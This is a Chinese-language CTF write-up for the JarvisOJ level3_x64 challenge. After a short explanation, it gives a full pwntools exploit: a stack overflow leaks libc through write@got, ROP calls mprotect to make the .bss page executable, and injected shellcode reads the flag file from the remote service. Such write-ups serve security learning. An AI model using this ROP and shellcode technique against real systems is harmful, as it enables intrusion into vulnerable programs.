mmap和mprotect練習，假設system和execve函式被禁用，請嘗試使用mmap和mprotect完成本題。

nc pwn2.jarvisoj.com 9884

附件同level3_x64

mmap可以將檔案或其他物件對映到記憶體中，mprotect可以改變某段地址的許可權（rwx）

程式開啟了NX保護，因此可以考慮用mprotect將一段bss段或data段設定成rwx許可權然後寫入shellcode並執行

exp如下：

from pwn import *

#io = process('./level3_x64')
io = remote('pwn2.jarvisoj.com
 
', 9884)
elf = ELF('./level3_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')
context.arch = 'amd64'
context.os = 'linux'
#context.log_level = 'debug'
pop_rdi = 0x4006b3
pop_rsi_r15 = 0x4006b1
write_plt = 0x4004B0
write_got = 0x600A58
read_plt = 0x4004C0
vuln_addr = 0x4005E6

payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload 
 
+= p64(0) + p64(write_plt) + p64(vuln_addr)
io.recvuntil('Input:\n')
io.send(payload)
write_addr = u64(io.recv(8))
info("write_addr:" + str(hex(write_addr)))
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + str(hex(libc_base)))
pop_rsi = 0x24885 + libc_base
info("pop_rsi:" + str(hex(pop_rsi)))
pop_rdx 
 
= 0x286 + libc_base
info("pop_rdx:" + str(hex(pop_rdx)))
mprotect_addr = libc_base + libc.symbols['mprotect']
info("mprotect_addr:" + str(hex(mprotect_addr)))

payload = b'a' * 136 + p64(pop_rdi) + p64(0x600000) + p64(pop_rsi) + p64(0x1000)
payload += p64(pop_rdx) + p64(7) + p64(mprotect_addr) + p64(vuln_addr)
io.recvuntil('Input:\n')
io.send(payload)

shellcode = shellcraft.open('./flag')
shellcode += shellcraft.read(3, 0x600500, 0x100)
shellcode += shellcraft.write(1, 0x600500, 0x100)
shellcode = asm(shellcode)
payload = b'a' * 136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x600000)
payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(0x600000)
io.recvuntil('Input:\n')
io.send(payload)
sleep(0.5)
io.send(shellcode)

io.interactive()